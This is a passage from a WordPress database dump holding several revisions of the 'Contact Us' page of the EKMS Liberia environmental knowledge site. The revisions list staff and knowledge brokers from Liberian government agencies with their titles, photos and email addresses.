href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p><p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\nManager\nDepartment of Marine Fisheries and Environment\nNaFAA\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Martin Killen </strong><br />IT Officer<br />NaFAA<br /><a href=\"mailto:maskillen@nafaa.gov.lr\">maskillen@nafaa.gov.lr</a></p><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-03-23 09:14:20','2021-03-23 09:14:20','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3599,42,'2021-03-23 09:14:20','2021-03-23 09:14:20','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Conservation Manager<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p><p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Martin Killen </strong><br />IT Officer<br />NaFAA<br /><a href=\"mailto:maskillen@nafaa.gov.lr\">maskillen@nafaa.gov.lr</a></p><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-03-23 09:14:20','2021-03-23 09:14:20','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3601,42,'2021-03-23 09:16:37','2021-03-23 09:16:37','','konikay','','inherit','open','closed','','konikay','','','2021-03-23 09:16:37','2021-03-23 09:16:37','',80,'https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png',0,'attachment','image/png',0),(3602,42,'2021-03-23 10:18:49','2021-03-23 10:18:49','','duolupeh','','inherit','open','closed','','duolupeh','','','2021-03-23 10:18:49','2021-03-23 10:18:49','',80,'https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png',0,'attachment','image/png',0),(3603,42,'2021-03-23 10:24:14','2021-03-23 10:24:14','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Conservation Manager<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p><p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Martin Killen </strong><br />IT Officer<br />NaFAA<br /><a href=\"mailto:maskillen@nafaa.gov.lr\">maskillen@nafaa.gov.lr</a></p><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" 